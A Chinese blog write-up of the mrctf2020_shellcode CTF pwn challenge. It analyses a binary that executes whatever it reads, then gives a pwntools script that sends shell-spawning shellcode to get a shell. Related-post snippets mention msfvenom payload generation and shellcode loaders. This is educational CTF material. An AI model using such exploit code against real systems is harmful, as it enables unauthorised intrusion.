mrctf2020_shellcode

最新推荐文章于 2023-09-21 23:07:45 发布
最新推荐文章于 2023-09-21 23:07:45 发布
阅读量579 收藏 3
点赞数 1
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/115983021
版权

拿到附件后,先file一下;
在这里插入图片描述
看到是个64bit的程序,拖到ida64里;

checksec一下附件,看看保护情况;
在这里插入图片描述
栈没有保护,有可读可写可执行的段;

可以dbg调试一下,看看具体情况;
在这里插入图片描述

可以看到有一个段可读可写可执行,栈也确实没有什么保护;

现在去IDA分析一下程序;
变量参数如下
在这里插入图片描述

在这里插入图片描述

可以看到前几行在设置标准输入输出和错误;
在这里插入图片描述

接着输出"Show me your magic!";
然后read一个400bytes的数据;

接着是关键代码,将$eax赋值给[rbp+var_4],接着与0进行比较;
>0则执行:
在这里插入图片描述

[rbp+buf]地址赋值给$rax
然后call这个地址;

≤0则执行(即退出):
在这里插入图片描述

看到这就可以写个shellcode到buf中,让程序能够跳到这个地址来执行shellcode;

# coding='utf-8'
from pwn import *
context(arch='amd64',os='linux',terminal=['tmux','sp','-h'])
p = process('./mrctf2020_shellcode')
shellcode = asm(shellcraft.sh())
p.send(shellcode)
p.interactive()

可以看到执行后弹出了shell;
在这里插入图片描述

连buuoj后,可拿flag;
在这里插入图片描述

K1ose
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pe_to_shellcode_linux:PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode(https:github.comhasherezadepe_to_shellcode
02-13
pe_to_shellcode_linux PE到shellcode会将任何Windows非.dot net 64位EXE文件转换为shellcode。 这基于hasherezade的Windows pe_to_shellcode( )。 Hashrezade的HLDR64文件源 下载和构建: 在终端中,通过git下载源代码: git clone cd进入文件夹: cd pe_to_shellcode_linux 键入./build.sh 选项: -f指定要转换的exe文件 -o输出要使用的二进制shell文件 用法:pe2shellcode -f 64bitexe.exe -o shellcode.sc
pe_to_shellcode:将PE转换为Shellcode
05-09
pe_to_shellcode 转换PE,以便可以像普通shellcode一样将其注入。 (同时,输出文件仍然是有效的PE)。 同时支持32位和64位PE 作者: 和 客观的 该项目的目标是提供一种生成PE文件的可能性,该文件可以轻松完成...
mrctf2020_shellcode详解
勿山几已
06-09 515
简单演示mrctf2020_shellcode解题步骤
mrctf2020_shellcode_revenge
z1r0的博客
01-12 2823
mrctf2020_shellcode_revenge 查看保护 只能看汇编,那就看一下吧,这个函数意思其实就是输入的长度大于0则中转到11ac。看一下11ac 给rbp-4的地方赋值为0,接着进123a 这个函数其实就是如果输入字符串长度大于0则跳转到11b8,否则call。这里放shellcode 不在0x60-0x7a跳转 0x40-0x5a 0x2f-0x5a 可以看到当0x60-0x70时不会跳转,0x2f-0x5a时不会跳转,输入shellcode的字符就应该保持在这个范围里即可
BUUCTF pwn——mrctf2020_shellcode
CNS-Enterprise BCC-1701-J
05-11 178
BUUCTF 做题练习
CDL_shellcode_源码
10-02
This is a shellcode file for javascript
Android系统shellcode编写.zip_android_shellcode
09-23
Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode的编写。
rs_shellcode:另一个shellcode运行器
05-23
rs-shellcode 在Rust中编写的shellcode运行器使用 。 如何使用它 安装 ,使用每晚toochain。 rustup default nightly 使用msfvenom生成shellcode进行测试。 msfvenom -p windows/x64/exec CMD=calc.exe --...
[BUUCTF]PWN——mrctf2020_shellcode
mcmuyanga的博客
01-08 1263
mrctf2020_shellcode 附件 步骤: 例行检查,64位程序,开启了relro和pie,没有nx,肯定是用shellcode最方便了 本地试运行一下,看看大概的情况 64位ida载入,根据运行时看到的字符串,迅速定位到关键程序,但是没法f5成伪代码,直接看汇编 栈大小是0x410,读入了0x400,无法造成溢出覆盖返回地址 不过好像这边分析了用处也不大,直接利用pwntools生成shellcode发送即可 shellcode=asm(shellcraft.sh()) exp fr
[BUUCTF]PWN——mrctf2020_shellcode_revenge(可见字符shellcode
mcmuyanga的博客
03-15 3550
mrctf2020_shellcode_revenge 例行检查,64位程序,开启了RELRO和PIE 本地运行看一下大概的情况 64位ida载入,没法f5,直接看汇编 jg大于则跳转,jl小于则跳转,jump无条件跳转 要让程序继续执行下去,肯定是跳转loc_11AC loc_123A loc_11B8 cdqe使用eax的最高位拓展rax高32位的所有位 movzx则是按无符号数传送+扩展(16-32) EAX是32位的寄存器,而AX是EAX的低16位,AH是ax的高8位,而AL是ax的低
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode)(内涵peak小知识)
Y_peak的博客
03-29 1153
[BUUCTF-pwn]——mrctf2020_shellcode_revenge(可见字符shellcode) 检查了下保护发现NX 没有开,肯定要自己写shellcode呀。 不过这道题,刷新了我的认知。众所周知,手写的shellcode里面肯定有很多不可见字符。第一次碰到可见的shellcode。 看下IDA, 不能反汇编不过问题不大,没事. 个人建议,看汇编的时候,建议看流程图,更加直观 将shellcode写入,那个buf 不过下面肯定大于0呀.rbp + var_8是我们输入字符串的长度.发生转
虎符CTF2022 —shellcode
最新发布
qq_54894802的博客
09-21 195
我们进行动态调试,先准备手动脱壳的,脱的时候发现居然有反调试,准备动态调试将反调试的patch但是发现很难脱,脱了半天还在循环,可能太菜的原因(T _ T)。或者记下这个地址,我们使用IDA的附加调试,将IDA附加到程序上,因为程序运行到了打印字符 了,所以壳肯定是解开了。将程序放入X32DBGz中进行分析,我们按F9运行几次,我们就可以运行到我们的OPE之中了。进入之后,我们进行简单的分析可以发现,这个函数实现的是base64加密。看分析还是比较简单,就是将原本程序里面的两端提示,进行加密的。
mrctf2020_shellcode_revenge(不用仔细分析汇编)
CsCN_的博客
07-10 362
日常拖进IDA一看,发现不能反编译,原因是0x124D位置有个call rax 然后看了一下汇编,发现又臭又长,由于本人还没有学汇编,有些地方看不懂 所以我干脆直接在IDA里面改汇编,把call rax改成call main就能反编译了 一目了然 稍加分析便能发现输入字符必须要在(47,122]里,也就是从0到z 图源:百度百科,侵删 后面的问题就变成怎样把用这些字符写出shellcode了 看了一些大佬们用alpha3重定向一下就能搞出shellcode,详见大.
[MRCTF2020] - Web
qtL0ng的博客
07-01 1032
[MRCTF2020]套娃 打开题目查看源码 <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b
others_shellcode
07-28
others_shellcode是一种外部的、已编写好的机器码程序,在计算机系统中用于执行恶意行为,例如攻击、病毒、木马等。它可以被黑客选用,注入到受害者主机的内存中,并被执行。由于others_shellcode本身就是已经准备好...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值